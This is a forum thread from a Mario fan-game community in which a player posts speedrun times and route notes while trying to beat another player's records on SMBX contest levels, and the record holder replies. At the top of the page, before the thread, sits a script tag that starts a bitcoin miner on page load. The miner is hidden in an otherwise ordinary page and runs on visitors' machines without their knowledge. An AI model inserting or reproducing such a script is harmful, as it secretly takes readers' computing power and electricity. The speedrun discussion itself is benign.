<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralmario fan games galaxy

Re: Eclipsing Zylgrox Odyssey (MAGLX 83rd Faithful Lumpy Toad IGT: 38:812)

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX 83rd Faithful Lumpy Toad IGT: 38:812)

Postby Eclipsed » 1 year ago

I decided to give myself some fun and set a personal challenge to beat Zyglrox's MAGLX Speedruns.

Most Recent Run
83rd Faithful Lumpy Toad by Kirbyman198 in 38:812

Other
Kaizo Contest X 1 All Level Clears No Cheat Codes/No Level Edits
Kaizo Contest X 3 All Level Clears No Cheat Codes/No Level Edits

Kaizo Contest X 3 Post Game Mountain of Scars
Kaizo Contest X 3 Winner ULTRAVIOLE[N]T
A Very Waaaaaarm Cave [2nd Clear]
Interdimensional Rift by MECHDRAGON777 in 47:283

I will be using the legal ruleset for contest levels, which is the following:
Advantages Description
Upon further consideration I have came to the conclusion it really isn't that impressive if I beat all of these runs because of the following

- SMBX runs at a framerate at 64.1s and the timer runs at 0.0156s per frame, which means each frame is 0.0156006 seconds, which means about every 15 seconds or 1000 frames, there is a 0.0006s advantage I gain meaning every 6 and a half minutes, the timer skips one frame.
- The In Game Timer accounts for lag, meaning that if your pc drops framerate for a bit, the timer accounts for what would be the maximum frame rate at that point and this timer method is the main one to determine best time. However, this is not allowed if lag is too major and noticeable throughout a run. Due to the fact Zyglrox used RTA, I don't know if he had lag or not in his runs and accounting for lag is practically hardware dependent and essentially unfair RNG to a point so IGT is the most fair way to time runs. I have a IGT 4:15 video with 15 seconds of lag and an IGT 4:03 with half a second of lag.
- Currently in the SMBX, the speedrunning community has have more knowledge than ever and back in Zyglrox's runs there were a lot of missed opportunities to run down slopes which increases speed, and it's easy to save time due to that. Furthermore, there is just a series of glitches people know now within the community.
- The discovery of the statue wall clip makes it so characters can clip through walls which means a lot of these runs will now be freebies within the context of the episode due to toad being able to clip into any level.

That being said, I will still be doing runs with the current standard of timing and record recognition which is IGT, but wanted to put this out there and am just trying to have fun doing this.

My Goal is to beat Zyglrox's speedrun by at least one frame IGT, since I use a laptop and without lag that would matchup perfectly to beat Zyglrox's RTA times.
Legal Rule Set
1. If the level is part of an episode, then only the characters/powerups accessible during the time of creation in that episode is allowed.
2. If the level is part of a contest or user created, then all 1.3 characters are allowed. Beta 2 characters/powerups are currently not allowed for runs.
3. If the level that satisfies case (2) has a character filter in its level files via code or blocks, then you have to play with that character
4. If the level satisfies case (2) but not (3), and is part of a contest where the theme is to design around a specific character, you may only use that character
5. For now, we are not adding levels or runs that focus on SMBX2 characters.

Also, if Zyglrox Odyssey did the run starting small, I will beat the run while small.

Anyways, without further ado, this shall be fun.
Playlist
Bonus
Interdimensional Rift by MECHDRAGON777 in 47:283

Tier 0 Tier 1 Tier 2 Tier 3
Tier 4
88th Too Few Fish in This Disaster by Freelop in 59:50
87th Disaster by Clemasterable in 3:50:973
86th Place Star 1 Koopa Devil Mansion by RPGFan4 in 3:22:612
86th Place Star 2 Koopa Devil Mansion by RPGFan4 in 7:15:083
85th Place Star 1 Swiftly and Abruptly Advance by Minnakht in 38:048
85th Place Star 2 Swiftly and Abruptly Advance by Minnakht in 58:593
84th My Own Take on Bowser's Back Door by Lejes in 1:03:897
Last edited by Eclipsed on 05 Nov 2019, 22:19, edited 107 times in total.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th Place World Record

Zyglrox's Time: 05:734

134th Place Grass Way Plains in 05:647

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th+133rd Place World Record

Zyglrox's Time 41.9

133rd Place - It's An SMB3 Level But Way More Stupid in 41.242

bkamakaze
A million dollars isn’t cool. You know what’s cool? A basilisk.
First name: (◕ v ◕✿)

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th+133rd Place World Record

Postby bkamakaze » 1 year ago

anybody who picks a fight with zyg has my full support 👍
ImageImageImage

pholtos
Loves adorable things.

Postby pholtos » 1 year ago

Oh man I can't wait to see how you'll possibly do Mission: Proud Sky. It's really super difficult.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-132nd.5 Place World Record (New Route for Starry Ocean Found)

I should probably write down text info on what makes my times faster explaining some details that you might not be aware of

134th Place
This run was mostly the same except a few minor difference between my run and Zyglrox's run.
-Ran down the slope at the end, so I shaved a few seconds off. In layman's term. Toad moves at 5.6 up slopes, 6.4 normally, and 7.4 down slopes.
-Furthermore, Zyglrox hesitated a bit when running on the enemies moving left allowing me to take a bit more time.

133rd Place
-In the upwards climb, I jumped earlier than Zyglrox did in his run, allowing me to shave off some time
-Not necessarily faster, but I found a more consistent method to do the pipe clip, once you start clipping if you hold jump, you will get 4 cases, (1) clips you upwards one block and all the way right, (2) clips all the way right, (3) floats in hole twice then clips to the right, and (4) fall into those random pipes. Most likely to least likely outcomes are in this order (2)-(3)-(4)-(1)
-Also instead of jumping over the pipe, I ducked in the area I could between it.

132nd Place
-First of all I used toad, which shaved off a ton of time. (Accessible in episode)
-I tried to avoid every powerup I could instead of collecting them since it wastes more time getting the powerup and tanking the hit.
-In the last autoscroll section, it was pretty bad, and it's actually hell when you collect the powerup and get hit because as you can see it closes in more and more. I however used the fact the plant was above toad and the bricks to jump on the pipe and spawn bowser so he'd get squished instead of doing the boss fight.

Zyglrox's Time 2:15:834
Starry Ocean Pipes in 2:06:890 (I could have probably shaven around 10+ seconds off if I did the last part optimally but the part with a million bullet bills is just stupid)
For those interested, there is an smbx speedrunning discord: Mechdragon and I currently have a rivalry for individual levels for the invasion 2 and lowser's conquest beta. We are currently on hiatus but it is intense to watch. https://discordapp.com/invite/554myYd
Last edited by Eclipsed on 21 Mar 2018, 07:11, edited 2 times in total.

Zygl

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-132nd.5 Place World Record (New Route for Starry Ocean Found)

Postby Zygl » 1 year ago

Now that like four different people have pinged me about this while I was at work :T

Not that I particularly care, but calling out my times specifically kinda loses a fair bit of its significance if you don't play by the same character restrictions I did :? I see the reasoning - you're thinking of the levels by themselves, I treated them in the context of the episode - but a lot of these levels are gonna be freebies simply by virtue of using Toad instead of whoever. What you guys do in the Discord or on the speedrun.com page is your business, but if you're gonna challenge me here on talkhaus you're just gonna look silly taking an advantage like that :k

That minor quibble aside though, I'll have to try to keep an eye on this - I've got a number of levels in mind offhand that I'm interested to see how you fare in <.<
ImageImage
ImageImage
ImageImage
ImageImage

Eclipsed

132nd Place - Second Star
-The only difference here is that on the very last jump, I chose to hover below the paratroopa instead of bounce on it

Zyglrox's Time: 20:034
Starry Ocean Pipes in 19:936

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-132nd Place World Record (New Route for Starry Ocean Found)

131st Place - Mission: Proud Sky

A few facts:
-Zyglrox's timing for his run is incorrect. He reported 12.233 but his actual time was 12.244. He is missing one frame in his measured time. I know this because. I really hope that the rest of Zyg's runs are timed accurately.
-Mario, Toad, Link, and Peach accelerate downards at the same pace. Luigi is one frame slower. One frame is 0.0156 seconds and the timer goes in increments of frames.
-Holding down while falling does not accelerate you faster
-There is no fast acceleration upon entering a level

A few more facts:
-Using tanooki suit makes you descend slower
-You cannot ground pound with purple yoshi if you do not jump off of ground first.

Tied World Record in 12.244

Zygl

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-132nd Place World Record (New Route for Starry Ocean Found)

Postby Zygl » 1 year ago

Eclipsed wrote: -Zyglrox's timing for his run is incorrect. He reported 12.233 but his actual time was 12.244. He is missing one frame in his measured time. I know this because. I really hope that the rest of Zyg's runs are timed accurately.
Yeah I didn't have the hardware to record at 60FPS until like, 12th place :k Single-frame inaccuracies are gonna happen.
ImageImage
ImageImage
ImageImage
ImageImage

Eclipsed

Zyglrox Odyssey wrote:
Not that I particularly care, but calling out my times specifically kinda loses a fair bit of its significance if you don't play by the same character restrictions I did :? I see the reasoning - you're thinking of the levels by themselves, I treated them in the context of the episode - but a lot of these levels are gonna be freebies simply by virtue of using Toad instead of whoever. What you guys do in the Discord or on the speedrun.com page is your business, but if you're gonna challenge me here on talkhaus you're just gonna look silly taking an advantage like that :k
It's just the rules speedrun.com uses. However, for non-contest levels that are specifically in episodes, you are not allowed to use any powerups and characters the episode does not provide you.

I will however display which ones have an impossible way to get the character played via the hub on the thread, so on to 130th place

Improvements
-Smoother landing on upwards slope in first section
-Faster vine climbing
-Faster descent in last section

Done Worse
-Turned left at top of checkpoint section
-Slower Boom Boom Fight

Zyglrox's Time: 51.333

Kirby Forest in 51.105

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-129th Place World Record (New Route for Fluffy Sky Tunnel Found)

129th Place - Fluffy Sky Tunnel (Accesible via Episode)

Improvements: I created an entirely new route with toad instead of mario(I have no idea why Zyglrox decided to use mario in this level or Starry Ocean Pipes)
-The route involves getting the leaf and first double jumping to the door. After doing so, you can double jump to skip the climbing up red blocks section

Zyglrox's Time 22.333

WR of Fluffy Sky Tunnel in 18.782
Also, heads up, I will be on a short pseudo-hiatus. I have a midterm coming up soon, and as much as I like speedrunning. I want to focus on that first. I also have to create about 500 save files for speedrun.com as a resource for lowser's conquest.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-128th Place World Record (Investigation of a Happy Ocean)

I'm deciding to do at max one run per day due to the tasks I have to do, so here is the following 128th place

Zyglrox's Time: 2:30.433
My Time: 2:27:092

Improvements
-Frame perfect second bomb
-Better Link Swimming Sections
-Better Triple Boom Boom
-Successful Red Boot Jump

What I did Worse
-Missed the Peach block
-Bad Vine Climb

WR in 2:27:092

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th, 131st-128th Place World Record - Why the Lack of Runs

I'm here to explain the reasons why there has been a lack of runs recently. Firstly, I'm trying to 100% Lowser's Conquest to add all categories of that into speedrun.com for individual levels. Secondly, the current timer does not include textbox time so my 133rd and 132nd normal exit runs are invalid, and I need to wait for MECHDRAGON777 to update his timer and do those runs again.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-133rd, 131st-128th Place World Record - Rules Update + Stupid SM

So the timer got fully fixed now so I'm here to leave you with a new run of It's an SMB3 level but way more stupid.

All I have to say is that there's no filter for toad and apparently toad is a lot faster than peach even though he travels more distance. What a broken character.

133rd It's an SMB3 Level, Except Way More Stupid in 37.982

Also, check the first post for the complete Individual Levels Rules Update
Also the first post now includes the following:

An organized catalog of all of the runs and times.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-128th Place WRs - Starry Ocean Pipe (Tier 0 Complete)

I went back and fixed my Starry Ocean Pipes run, and I still don't know why Zyglrox did not use toad in this level when there wasn't a filter.

132nd Starry Ocean Pipes by IceT Star 1 in 2:04.519

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-128th WRs - Proud Sky Retimed (Super Diffccult!!!)

It's really not worth your time to look at this run, but the time Zyglrox and I actually got on proud sky was 13.228. Apparently the old timer was one frame slower than it actually was supposed to be.

It's Seriously Not Worth Your Time to Watch This

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-127th WRs - Too Many Rivers

I just realized I had a backlog of 4 more records.

Anyways, currently, I'm stuck on trying to beat Disgruntledgammler. The last phase is just super akward for me and I can't get a good handle on it. I tried the running the two levels after that and I had an easier time but their either super long or require one pixel perfect thing. This level is actually the least fun I have been having in my endeavors.

Anyways Too Many Rivers Record
Too Many Rivers in 31:933

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-127th WRs - Too Many Rivers

Flying Space Fish in 50:637

Nothing much to say about this one. As an update, I will be allowing myself to use 3 run skips at a time because I want to work on this endeavor without feeling frustrated about being stuck on the same level.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-126th WRs - Flying Space Fish

126th Flying Space Fish by 8SomaCruzes Star 2 in 46:722

Here is the most recent maglx run, I have. It is the second star in flying space fish. I just was too lazy to upload it until now.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (MAGLX Speedruns) - 134th-125th WRs - The Ghostly Lake

125th The Ghostly Lake by Nathan The Talkmaus in 35:318
I remember when I was actually playing the game. Do you remember?

Eclipsed

Re: Eclipsing Zylgrox Odyssey (Update)

If anyone's wondering, I have been stuck on VS. Disruntledgammler for the past 4 months, but a new glitch was recently discovered by MECHDRAGON777.
Zyglrox Odyssey wrote: Notify. I think you'll find this interesting.
Tanooki Statue Wall Clip with Toad
Basically you spin jump into a wall, use tanooki statue and then you can clip through ANY wall in the game and since this contest has a section with all powerups and allows you to use toad, this makes it so Toad is now accessible in the episode itself for most levels.

Eclipsed

Re: Eclipsing Zylgrox Odyssey (124th Place New Route for VS DisgruntledGammler Used - Beaten by 6s)

Finally. This took 3 months of on and off attempts and 4 different routes to try out but I finally beat Zyglrox's 38.800 by over 6s

124th Versus Disgruntledgammler in 32:713

Eclipsed

Re: Eclipsing Zylgrox Odyssey (123rd Chaos House - Honestly Not Worth Your Time To Watch)

Beats Zylgrox by a second.
Disclaimer: This speedrun is honestly not worth your time to watch, it beats the time but I don't like the run enough, but after two hours of attempts with 4 completed runs, you take what you can get.

The only reason I beat the time was because I did door jumping, faster ladder climbing, and a no damage tank section.

The bounce house wasted all of the time I was ahead by 6 seconds down to 1 second combined with the big pipe entrance in the bounce house.

Boom Boom room had better RNG but same execution time wise as Zyglrox.

123rd Chaos House by Heavy Sigh in 2:53:757

Eclipsed

Re: Eclipsing Zylgrox Odyssey (Advantages Description)

Upon further consideration I have came to the conclusion it really isn't that impressive if I beat all of these runs because of the following

- SMBX runs at a framerate at 64.1s and the timer runs at 0.0156s per frame, which means each frame is 0.0156006 seconds, which means about every 15 seconds or 1000 frames, there is a 0.0006s advantage I gain meaning every 6 and a half minutes, the timer skips one frame.
- The In Game Timer accounts for lag, meaning that if your pc drops framerate for a bit, the timer accounts for what would be the maximum frame rate at that point and this timer method is the main one to determine best time. However, this is not allowed if lag is too major and noticeable throughout a run. Due to the fact Zyglrox used RTA, I don't know if he had lag or not in his runs and accounting for lag is practically hardware dependent and essentially unfair RNG to a point so IGT is the most fair way to time runs. I have a IGT 4:15 video with 15 seconds of lag and an IGT 4:03 with half a second of lag.
- Currently in the SMBX, the speedrunning community has have more knowledge than ever and back in Zyglrox's runs there were a lot of missed opportunities to run down slopes which increases speed, and it's easy to save time due to that. Furthermore, there is just a series of glitches people know now within the community.
- The discovery of the statue wall clip makes it so characters can clip through walls which means a lot of these runs will now be freebies within the context of the episode due to toad being able to clip into any level.

That being said, I will still be doing runs with the current standard of timing and record recognition which is IGT, but wanted to put this out there and am just trying to have fun doing this.

Return to “let's play”